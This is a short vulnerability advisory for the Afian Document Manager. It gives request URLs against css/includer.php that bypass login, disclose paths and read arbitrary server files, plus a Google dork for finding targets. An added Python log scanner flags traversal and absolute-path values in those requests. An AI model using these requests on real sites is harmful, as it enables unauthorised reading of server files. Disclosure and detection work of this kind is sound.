
Afian Document Manager Local File Inclusion






Afian is an application that can add, in just minutes, powerful document management capabilities to any Web server. It provides a Web-based interface for documents residing on the Web server's file system.

This software has a security hole that allows attackers to download any file if they know its path.

Vendor: afian.com
Vulnerabilities: Bypass + Fullpath Disclosure + Local File Inclusion.
Version: Unknown (maybe 2.x.x)
Demo: http://demo.afian.com 

Exploit:
Google Dork: Afian document manager

1. Bypass + Fullpath Disclosure:
http://site/path/css/includer.php?files=NOT_EXIST_FILE
It does not ask for a username/password and displays the full path.
2. Local File Inclusion: reads any file if the exact path of the file is known:
http://site/path/css/includer.php?files=PATH_TO_FILE
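
Added detection example (not part of the original advisory and not Afian's code): a Python scan of web server access logs for requests to css/includer.php whose files parameter is anything other than a plain stylesheet name. The combined log format, the comma-separated value convention, the plain .css baseline and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter name come from the advisory. The combined log format
# and the "plain *.css file name" baseline are assumptions of this example.
ENDPOINT = "/css/includer.php"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')
PLAIN_CSS = re.compile(r"[A-Za-z0-9_-]+\.css")

def classify(value):
    """Return the reasons a `files` value is not a plain stylesheet name."""
    previous = None
    while previous != value:  # undo nested percent-encoding
        previous, value = value, unquote(value)
    reasons = set()
    for name in value.split(","):  # assumption: comma-separated list
        if re.match(r"([A-Za-z]:)?[\\/]", name):
            reasons.add("absolute_path")
        if ".." in re.split(r"[\\/]", name):
            reasons.add("traversal")
        if not PLAIN_CSS.fullmatch(name):
            reasons.add("not_plain_css")
    return sorted(reasons)

def scan(lines):
    """Return (client, status, files_value, reasons) for each flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(ENDPOINT):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("files", []):
            reasons = classify(value)
            if reasons:
                hits.append((client, int(status), value, reasons))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /docs/css/includer.php?files=style.css HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /docs/css/includer.php?files=NOT_EXIST_FILE HTTP/1.1" 200 310',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /docs/css/includer.php?files=/var/www/docs/config.php HTTP/1.1" 200 2048',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /docs/css/includer.php?files=%252e%252e%252fconfig.php HTTP/1.1" 200 2048',
]
print(*scan(SAMPLE_LOG), sep="\n")
```

Because the advisory says the endpoint answers without a login, flagged requests that arrive with no session cookie are worth correlating with the response size to judge whether file contents were returned.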
